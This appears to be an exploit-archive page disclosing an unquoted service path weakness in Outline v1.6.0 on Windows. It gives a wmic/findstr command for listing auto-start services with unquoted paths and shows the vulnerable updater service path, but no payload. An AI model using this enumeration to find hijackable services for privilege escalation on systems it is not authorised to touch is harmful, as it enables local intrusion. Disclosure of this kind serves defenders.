Outline v1.6.0 unquoted service path Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-03-29 |
Type : local |
Platform : windows
This exploit / vulnerability Outline v1.6.0 unquoted service path is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Outline V1.6.0 - Unquoted Service Path
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Discovery Date: 2022-11-10
# Vendor Homepage: https://getoutline.org/
# Software Link: https://getoutline.org/
# Tested Version: V1.6.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 11 Enterprise
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Outline Updater OutlineServiceSvc C:\Program Files (x86)\Outline\OutlineService.exe
Auto